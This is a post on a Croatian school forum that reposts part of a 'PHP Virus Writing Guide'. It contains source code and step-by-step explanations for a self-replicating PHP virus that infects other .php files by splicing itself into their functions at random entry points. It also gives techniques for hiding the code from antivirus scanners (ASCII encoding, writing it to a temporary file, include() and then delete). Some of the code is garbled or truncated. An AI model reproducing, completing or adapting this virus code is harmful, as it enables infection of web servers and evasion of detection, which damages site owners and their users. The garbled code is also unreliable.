Prva Gimnazija Zagreb Forum
Pozdrav,latinski riječnik update+povijest update!

Display results as :

Rechercher Advanced Search

Broj posjeta:

PHP Virus Writing Guide part 2

Prethodna tema Sljedeća tema Go down

PHP Virus Writing Guide part 2

Postaj  zekton on pet tra 17, 2009 1:00 am

- - - - - - - - - - - - - [ EPO virus - Type I ] - - - - - - - - - - - - -

This is an example for the EPO technique, which I descript above. It's quite
easy to understand, anyway, I'll tell you how the virus works exactly:

--> Searchs itself in the host file and reads the next 987 bytes.

--> Opens a .php file

--> Checks how many possible entry points the virus has

--> Find one Entry Point randomly

--> Reads the code before the EP and the code after it

--> Writes the code before, the virus code and the code after the entry
Point to the file

ii) Using a function of the victim

This technique is maybe little bit better than the other one. But in fact
I've seen this type of EPO in any script virus (ok, I haven't seen really
many EPO script viruses :D). I've already told you, that the virus will
use a function by the host file. But maybe you don't really understand,
what I mean, therefore I'll show you, what I mean. Here you can see a
non-infected file and an infected file. Hope that help you to get the
point of the idea:

Normal File: Infected File:
_________________________ _________________________
| call to function() | | call to function() |
| function() | | function() |
| HOST CODE-3 | | < < VIRUS > > |
| end function | | call to real funtion |
| HOST-CODE-4 | | end function |
|_________________________| | HOST-CODE-4 |
| real function |
| end real function |

Now you should understand, what I mean, but how to manage this? First you
have to search for every function in the code than you use on of them, save
the victim's function code and copy the virus code to the function. After
the virus code you need a call to a real function, which you can add
in the end of the file. The name of the real function is no problem,
since your code call it. Now I also made an exaple for this technique, as
you may imagine. Look at it, and try to understand. The techniqual description
will follow after the code:

- - - - - - - - - - - - - [ EPO virus - Type II ] - - - - - - - - - - - - -
fseek($filehandle, $ln);
$content=fread($filehandle, 1611);
while ($file = readdir($curdir))
if (strstr($file, '.php'))
$victim=fopen($file, 'r+');
$vicont=fread($victim, filesize($file));
if (!strstr($vicont, 'SPTH'))
$possible=0; $viccont=$vicont;
while(strstr($viccont, 'function '))
$viccont=strstr($viccont, 'unction ');
$viccont=strstr($viccont, 'function ');
$viccont=strstr($viccont, '{');
$before=strlen($vicont)-strlen($viccont)+1; $check=0; $i=0;
if ($viccont{$i}=='{') { $check++; }
if ($viccont{$i++}=='}') { $check--; }
fseek($victim, $before);
$funccont=fread($victim, $i+1);
fseek($victim, $before+$i-1);
$aftercont=fread($victim, filesize($file)-$before-$i-strlen(strstr($vicont, '?>')));
$coundj=0; $newvar='';
$newvar.=chr(rand(97,122)); $countj++;
while ($countj rewind($victim);
$beforecont=fread($victim, $before);
fwrite($victim, $beforecont.chr(13).chr(10).'$ln='.($before+strlen($before)+9).';'.chr(13).chr(10).$content.chr(13).chr(10).$newvar.'(); }'.$aftercont.chr(13).chr(10).'function '.$newvar.'() {'.chr(13).chr(10).$funccont.'?'.'>');

- - - - - - - - - - - - - [ EPO virus - Type II ] - - - - - - - - - - - - -

To understand this code, you must not be a beginner. Smile I worked about 4-5h
at this little thing. Anyway, it works really fine and I want to tell you,
how it works:

--> Searchs for the virus itselfs via a variable called '$ln', which contains
the information, where the virus is in the file. The variable have to
be new generated every virus run, since the virus is at different places
every generation. It contains the Entry Point in bytes.

--> Searchs for a .PHP file, which are not already infected

--> Searchs for 'function ' in the victim, to get the possible new entry points

--> Find one Entry Point randomly

--> Searchs for the content, which is before the founden function

--> Searchs for the funtion-content

--> Searchs for the content, which is after the founden function

--> Makes a new function, with a random name, and include the function-content

--> Writes the beginn-content, the function with the virus content, a call to the new
function (which contains the real host-code), the after-content, and the new function
with the whole content from the function.

2) Encryption

The first part of the article should give you the idea, how to write a success-
ful virus in PHP. But more or less, these techniques are easy to detect for
Anti-Virus companies. Therefore I also want to show you, how to fake them. This
(and of corse the next part: Polymorphism) of the article should help you to
write a PHP virus, which can not be detected by simple string scan or just to
decrease scanstrings. I found many different kinds to crypt a PHP string, and of
corse, I want to tell them to you Smile

a) Changing virus to ASCII

Using the whole virus into characters should not be a big problem. To execute
the code in character I thought about 'eval()'. But after 2h of testing I
saw that it don't work. So I had to think of another way: Include the virus-
code (written in ASCII) to a new file, run the file via 'include()', and delete
it. Therefor I made an example, which shows, how you may use the technique:

- - - - - - - - - - - - - [ Encryption Example - Type I ] - - - - - - - - - - - - -
fwrite($a, $content);
- - - - - - - - - - - - - [ Encryption Example - Type I ] - - - - - - - - - - - - -

You should understand the prinzip of the code really fast. The encrypt code
contains a 'secret' message. Smile I'll show you, how it works, if you haven't
understand it so far:

--> '$content' contains a PHP script in ASCII form. Here you should use your virus
code. Just making ASCII of the normal letters, and add them to a variable.
NOTE: Since the encrypt data should be a fully workable file, you have to
add '', and the whole PHP syntax (for instands semikolons).

--> Makes a new file (because I couldn't find a command to make a file, I copies
'__FILE__', and overwrites it.

--> Writes the encrypt content to the file (but now: unencrypt!)

--> Opens the file (via 'include(<-file->)')

--> Deletes the file (via 'unlink(<-file->)')

b) Useing an intern decryption function

This head-line sounds strange. Well, it isn't Smile. The basic of the idea is
this one: You call a function with 3 values, and get the right sign back.
The idea isn't hard to understand. I used the same prinzip as at the last
example. The only differents is the encryption: Now I use a function-call
instead of a real sign. But because the function calculates the right sign,
and returns it, it's no problem. I hope, that you understand it. Now let's
have a look at my example for this techique:

Broj postova : 65
Join date : 15.02.2009

Korisnički profil

[Vrh] Go down

Prethodna tema Sljedeća tema [Vrh]

- Similar topics

Permissions in this forum:
Ne moľeą odgovarati na postove.